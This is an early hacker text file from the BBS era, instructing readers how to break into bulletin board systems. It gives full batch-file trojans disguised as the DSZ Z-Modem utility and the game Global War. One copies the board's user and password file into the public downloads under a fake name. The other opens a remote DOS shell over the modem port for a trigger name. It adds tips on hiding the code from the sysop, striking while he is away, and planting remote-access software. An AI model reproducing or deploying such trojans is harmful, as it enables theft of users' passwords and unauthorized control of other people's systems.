Computer Terror and Distruction Issue #1 - BBS Infiltration
By the Chamelion
This article starts of the first issue of Computer Terror and
Distruction. Each issue will deal with a particular area of computer distruction, dealing mostly with different ways to fuck over computers.
After taking a look at some of the better phreak/hack BBS
systems, I haven't been able to find any good material on BBS distruction. Most of the information I have gathered is rather simple and outdated, and dealt mostly with hitting Control Break alot. Well, as most BBS systems are no longer written is basic, this is a rather stupid thing to try doing. (Although it still works on some lame BBS games). One of the best methods of breaking into a BBS is uploading a trojan horse. The easiest language to create a trojan is in batch language. However, the sysop can easily view the program before he runs it, and thus the trojan is discovered. However, using a new program called BAT2EXEC, you can convert your trojan batch file to a COM file, which is harder to read.
(Note: If BAT2EXEC.COM isn't in the archive file, it was created by Pc.Magazine and can be found on many sharewars BBS's)
To compile a batch file edit the batch file with edlin then type
in BAT2EXEC.COM, followed by the batch file. It will convert the file to COM format. This is nice for speeding up large batch files, etc. But, there is another important reason which makes this program useful. Let's say that there is this lamer BBS is your area, and you want to mess with the BBS. Here, you have two choices. You can steal the USERS.BBS listing, which includes all users and their passwords. Or, you can set up his BBS so you can shell to his DOS to do whatever you want. What you want to do is setup a Trojan Horse on the system to do whatever you want. The best way to do this is to give the sysop software that he is likely to use. Secretly you booby-trap it to do what you want.
Ok, the next section deals with how to steal the USERS.BBS
listing, which includes all user names and passwords. The second section is all about how to get access to the systems DOS via modem. I'd read the first section, as it includes lots of information you need to know.
SECTION #1 - How to get a copy of the user file.
First, get the docs for the type of software the target BBS
operates with, and find out the name of listing. USERS.BBS works for Remote Access, but Pcboard, etc use different names. Now, get some utility or game that the BBS sysop is sure to run on his system. Now, look at the files that are included in the utility (or game).
For example, DSZ includes-
and a bunch of other shit. So, first rename DSZ.EXE DSZ.DAT. Then, using EDLIN (For some reason, you need to use EDLIN for it to work with BAT2EXEC. This is probably because in EDLIN you hit control C to end the text, and BAT2EXEC looks for this. So, you can type everything but the last two lines in a text editor, and finish it off with EDLIN, using CONTROL C to stop entering text.)
Now, make a batch file called DSZ.BAT. It should look something like this.
@ECHO OFF IF EXIST C:\RA\USERS.BBS GOTO COPY REM Checks to see if the USERS.BBS listing is there. GOTO DSZ :COPY IF EXIST D:\FILES\UPLOAD\GAME.ZIP GOTO DSZ REM Sets it to only copy once. REM Now we want to copy the USERS.BBS listing to the new file REN directory, under the name of GAME.ZIP COPY C:\RA\USERS.BBS D:\FILES\UPLOAD\GAME.ZIP >DMP.DMP REM DMP.DMP is used to redirect the screen output REM Now is the tricky part. You need to have FILES.BBS listing REM add TOOBIN1.ZIP to it's listing of on-line files. COPY DSZ.DMP + D:\FILES\UPLOAD\FILES.BBS D:\FILES\UPLOAD\FILES.BAK > DMP.DMP REM D:\files\upload will change depending on the sub-dir setup. REM DSZ.DMP, a file you will need to make, is appended to REM a listing of all available files. COPY D:\FILES\UPLOAD\FILES.BAK D:\FILES\UPLOAD\FILES.BBS >DMP.DMP DEL DMP.DMP :DSZ REM Now we want to run DSZ like normal. REN DSZ.DAT DZ.EXE REM Turn back on monitor DSZ %1 %2 %3 %4 %5 %6 %7 REN DZ.EXE DSZ.DAT REM All done! Now, run BAT2EXEC DSZ.BAT, to create DSZ.COM
Ok, remember how i said you need to add USERS.BBS (which was
renamed game.zip) to the FILES.BBS listing? Ok, now create a file that is called DSZ.DMP, and that looks like this.
GAME.ZIP Game Disk #1, cracked by INC!
(Description should start on 14th line)
Now I will recap what will happen when you have everything
setup. The sysop sees that someone (You) has uploaded the newest version of DSZ Z-Modem, so he installs it. The files he places in his protocol directory are:
DSZ.COM -Your batch file changed into COM. DSZ.DAT -The real DSZ DSZ.DOC -Docs to DSZ DSZ.DMP -Has text that says "game.zip"
Now, he gets his BBS software to run DSZ.COM, which he thinks is
DSZ. Because it's a com file, he can't tell what it does, which is the whole reason for using BAT2EXEC.COM anyway. There is no way he can tell what DSZ.COM does. DSZ.COM runs, and copies USERS.BBS listing to the new files listing under the name GAME.ZIP. Then, DSZ.DMP is added to the Files.BBS listing, so when you do a listing of new files, it will be there. Then DSZ.DAT is renamed to DZ.EXE. DZ.EXE is then run. Then DZ.EXE is renamed back to DSZ.DAT. Now, all you have to do is download GAME.ZIP, and you are off!
Of course, it is even easier to delete Users.BBS, but that's not as much phun.
Ok, now let's say you want to shell to the BBS system's DOS,
instead of copying the user listing. Do this when the sysop is out of town, etc, so he doesn't show up and see what you are doing. This time, the example uses Global War, a popular BBS game.
Rename Gwar.exe GW.DAT
@ECHO OFF IF %5==JACK GOTO FIRST IF %5==jack goto first REM Replace Jack with your first name GOTO RUN :first IF %6==RIPPER GOTO LAST if %6==ripper GOTO LAST REM Replace Ripper with your last name GOTO RUN :LAST CTTY COM1 REM Choose the com port that the BBS uses! c:\command.com REM Just type "Exit" to end the shell goto end :run ren gw.dat gw.exe gw.exe %1 %2 %3 %4 %5 %6 %7 ren gw.exe gw.dat :END
Now, when you give the sysop the file, and he installs it,
whenever you try to run GWAR, you will be placed in a DOS shell! just remember several things. Don't try to directly import any of these files. You will need to make modifications, depending on the BBS type, and several other parameters. For example, Gwar is not always run from the command line, and may search a file for the user name. It is important that no one is around when you do this. It's a good idea to mess around as much as possible before you upload something.
Also, when you are in that DOS shell, don't run any graphic
applications. The best way to do it is to upload a simple gateway program like PC Anywhere. Once you are in DOS, go unzip it and then run it. The best thing to do is be completely origional in your style of creating trojan horses, always use a bogus name or alias.
BTW, I can be reached via bitnet at
email@example.com ...psuvax1!psuecl!hiway!chamelio ...psuvax1!hogbbs!hiway!chamelio
Or on Lost Dungeon 1 gig! (212)
(I do not accept any responsabilty for what you may do (or have done to you) with this information. Use at your own risk)
Greets go out to Electric Monk, The Pope, and Zolten Coldia, and Road Master.
EGBT is comming to a computer near you! and Road Master.
EGBT is comming to a computer near you!